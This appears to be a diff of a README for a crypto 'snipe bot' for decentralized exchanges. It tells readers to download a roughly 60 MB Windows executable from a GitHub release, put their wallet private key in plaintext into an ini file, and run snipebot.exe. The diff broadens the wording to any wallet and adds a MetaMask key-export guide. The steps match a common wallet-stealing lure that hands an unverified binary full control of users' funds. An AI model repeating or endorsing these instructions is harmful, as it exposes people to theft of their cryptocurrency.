GitSpecialClone/AutoSnipeBot/README.md

 <H2>Getting started</H2>

 1. Download the latest release from <a href="https://github.com/JesusCrypto/windows-full-SNIPEBOT-Pancakeswap-Uniswap-Pangolin-Polygon-Bakeryswap/releases">here</a>. ```(verify that the downloaded file has a size of around 60mb, otherwise your downloaded file will be corrupt)```
-2. Open "usersetting.ini" (with notepad for instance) and add your ethereum/bsc address and private key in the corresponding fields after the equal (=).
+2. Open "usersetting.ini" (with notepad for instance) and add your wallet address and private key in the corresponding fields after the equal (=).
 <pre>address=0x0000000000000000000000000000000000000000
 privatekey=00000000000000000000000000000000000000000000000000</pre>
-**You can get the private key by following this guide: https://metamask.zendesk.com/hc/en-us/articles/360015289632-How-to-Export-an-Account-Private-Key**
+Note: In theory any wallet that allows you to export the privatekey should work, in particular I work with metamask, **You can get the private key by following this guide: https://metamask.zendesk.com/hc/en-us/articles/360015289632-How-to-Export-an-Account-Private-Key**

 3. Run "snipebot.exe" **(To open without problems it is necessary that the files "core.exe, usersetting.ini and configfile.py are in the same folder)**